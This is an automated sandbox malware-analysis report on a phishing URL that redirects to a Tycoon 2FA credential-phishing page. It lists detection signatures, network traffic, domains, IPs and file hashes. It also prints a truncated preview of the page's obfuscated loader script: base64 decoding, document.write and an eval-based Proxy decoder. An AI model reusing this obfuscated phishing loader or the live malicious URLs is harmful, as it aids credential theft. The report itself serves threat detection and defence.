Edit tour

Windows Analysis Report
http://nicholsoncop.com/

Overview

General Information

Sample URL:http://nicholsoncop.com/
Analysis ID:1647585
Infos:

Detection

Invisible JS, Tycoon2FA
Score:84
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 1308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4920 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.1.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    0.0.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.0.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        0.4..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.1.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            Click to see the 5 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://knig.rocaterma.ru/favicon.icoAvira URL Cloud: Label: malware

            Phishing

            barindex
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.4..script.csv, type: HTML
            Source: Yara matchFile source: 0.1.pages.csv, type: HTML
            Source: Yara matchFile source: 0.0.pages.csv, type: HTML
            Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
            Source: Yara matchFile source: 0.5.d.script.csv, type: HTML
            Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://knig.rocaterma.ru/krVkG/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to redirect the user to a suspicious domain and collect sensitive information, which is a clear indication of malicious intent.
            Source: 0.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://knig.rocaterma.ru/krVkG/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
            Source: https://knig.rocaterma.ru/krVkG/HTTP Parser: No favicon
            Source: https://knig.rocaterma.ru/krVkG/HTTP Parser: No favicon
            Source: unknownHTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.6:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.163
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /krVkG/ HTTP/1.1Host: knig.rocaterma.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://knig.rocaterma.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: knig.rocaterma.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://knig.rocaterma.ru/krVkG/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnYiLCJtYWMiOiI4YzQyZDE4MDcyYmU5NmNiNTk3YzUwOGRkYjllOGNiMjA2N2I2MWI0MzJmODJjOWI2MzQ2NjdmZDNhMDFlODMxIiwidGFnIjoiIn0%3D
            Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CO6MywE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: nicholsoncop.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: nicholsoncop.com
            Source: global trafficDNS traffic detected: DNS query: knig.rocaterma.ru
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: unknownHTTP traffic detected: POST /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 432Content-Type: application/reports+jsonOrigin: https://knig.rocaterma.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 23:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=35119&min_rtt=35008&rtt_var=13207&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2236&delivery_rate=81352&cwnd=252&unsent_bytes=0&cid=87cb41bd4521fd5f&ts=395&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925a1fb69914c64a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=96202&min_rtt=96048&rtt_var=20385&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=38769&cwnd=226&unsent_bytes=0&cid=cee02409b072dd4f&ts=831&x=0"
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 142.251.41.4:443 -> 192.168.2.6:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.6:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.6:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1308_853168764Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1308_853168764Jump to behavior
            Source: classification engineClassification label: mal84.phis.evad.win@24/8@12/6
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nicholsoncop.com/"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2128,i,14344840874632310820,2799098671391695099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1647585 URL: http://nicholsoncop.com/ Startdate: 25/03/2025 Architecture: WINDOWS Score: 84 22 Antivirus detection for URL or domain 2->22 24 Yara detected AntiDebug via timestamp check 2->24 26 Yara detected Tycoon 2FA PaaS 2->26 28 3 other signatures 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.6, 138, 443, 49695 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 knig.rocaterma.ru 172.67.194.216, 443, 49700, 49709 CLOUDFLARENETUS United States 11->16 18 nicholsoncop.com 192.64.119.145, 443, 49696, 49697 NAMECHEAP-NETUS United States 11->18 20 3 other IPs or domains 11->20

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            http://nicholsoncop.com/0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://knig.rocaterma.ru/favicon.ico100%Avira URL Cloudmalware

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              code.jquery.com
              151.101.130.137
              truefalse
                high
                www.google.com
                142.251.41.4
                truefalse
                  high
                  knig.rocaterma.ru
                  172.67.194.216
                  truetrue
                    unknown
                    nicholsoncop.com
                    192.64.119.145
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://nicholsoncop.com/false
                        unknown
                        https://a.nel.cloudflare.com/report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulqfalse
                          high
                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                            high
                            https://knig.rocaterma.ru/favicon.icofalse
                            • Avira URL Cloud: malware
                            unknown
                            https://knig.rocaterma.ru/krVkG/true
                              unknown
                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                151.101.130.137
                                code.jquery.comUnited States
                                54113FASTLYUSfalse
                                35.190.80.1
                                a.nel.cloudflare.comUnited States
                                15169GOOGLEUSfalse
                                192.64.119.145
                                nicholsoncop.comUnited States
                                22612NAMECHEAP-NETUSfalse
                                142.251.41.4
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                172.67.194.216
                                knig.rocaterma.ruUnited States
                                13335CLOUDFLARENETUStrue
                                IP
                                192.168.2.6
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1647585
                                Start date and time:2025-03-25 00:58:20 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 21s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:browseurl.jbs
                                Sample URL:http://nicholsoncop.com/
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal84.phis.evad.win@24/8@12/6
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe, TextInputHost.exe
                                • Excluded IPs from analysis (whitelisted): 142.251.41.3, 142.251.35.174, 142.250.72.110, 142.251.111.84, 142.251.40.110, 142.250.80.46, 199.232.214.172, 142.250.176.202, 142.251.41.10, 142.250.80.10, 172.217.165.138, 142.251.40.170, 142.250.65.170, 142.250.80.106, 142.250.72.106, 142.250.80.74, 142.251.40.234, 142.251.32.106, 142.250.65.234, 142.250.80.42, 142.250.65.202, 142.250.81.234, 142.251.40.202, 142.250.65.174, 142.251.32.110, 142.251.40.142, 142.250.81.238, 142.250.64.78, 142.251.40.238, 142.250.64.67, 142.250.80.78, 142.250.80.3, 184.31.69.3, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: http://nicholsoncop.com/
                                No simulations
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with no line terminators
                                Category:downloaded
                                Size (bytes):16
                                Entropy (8bit):3.5
                                Encrypted:false
                                SSDEEP:3:H+rYn:D
                                MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                Malicious:false
                                Reputation:low
                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCXHBnhv-hXjkEgUNNzCpMCGKHZOJ1VAN2g==?alt=proto
                                Preview:CgkKBw03MKkwGgA=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:HTML document, ASCII text, with very long lines (65364)
                                Category:downloaded
                                Size (bytes):777059
                                Entropy (8bit):3.178604596577894
                                Encrypted:false
                                SSDEEP:384:giyHgc+AhtBMUiyHgc+AhtBMZLkK2A7TrLkK2A7T7:gihcHmUihcHmZLkK9TrLkK9T7
                                MD5:62383B9A9870640565693DEFB6589AA9
                                SHA1:642B6C6CEE1791337E9F556BC65DC4993ECC408C
                                SHA-256:818952193C8E07A9EFC2E10C2727FB49F8F033EE3124BBC7962178CE8683E7F0
                                SHA-512:EC7F47F939BDCB67F7FDB55D3FCA4AE281F7F0A6EAD78112D0A70623648060026E4F02A46BF16304FB5B833FCFE7DCE1CA70A918A8F609134CFD3D4F3C47D501
                                Malicious:false
                                Reputation:low
                                URL:https://knig.rocaterma.ru/krVkG/
                                Preview:<script>.YFKwHfZGUc = atob("aHR0cHM6Ly9rTmlHLnJvY2F0ZXJtYS5ydS9rclZrRy8=");.rcRAyxflCd = atob("bm9tYXRjaA==");.UOqCUgUYuB = atob("d3JpdGU=");.if(YFKwHfZGUc == rcRAyxflCd){.document[UOqCUgUYuB](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RWRnZSxjaHJvbWU9MSI+CiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4KICAgIDx0aXRsZT4mIzgyMDM7PC90aXRsZT4KICAgIDxzY3JpcHQ+CiAgICBjb25zdCBZekJieGtJT0ZBID0gewogIGdldChDeHhTc25kdU9WLCBxZFNreFBxSnJXKSB7CiAgICBjb25zdCBreEN3WnpOa1pPID0gWy4uLnFkU2t4UHFKclddCiAgICAgIC5tYXAobUN3Q0FaQ3NDSSA9PiArKCfvvqAnID4gbUN3Q0FaQ3NDSSkpCiAgICAgIC5qb2luKCcnKTsKICAgIGNvbnN0IEpWemNTdlZidGEgPSBreEN3WnpOa1pPLnJlcGxhY2UoLy57OH0vZywgaktmald3dEJsQyA9PgogICAgICBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGpLZmpXd3RCbEMsIDIpKQogICAgKTsKICAgIHJldHVybiBldmFsKEpWemNTdlZidGEpOwogIH0
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:downloaded
                                Size (bytes):89501
                                Entropy (8bit):5.289893677458563
                                Encrypted:false
                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
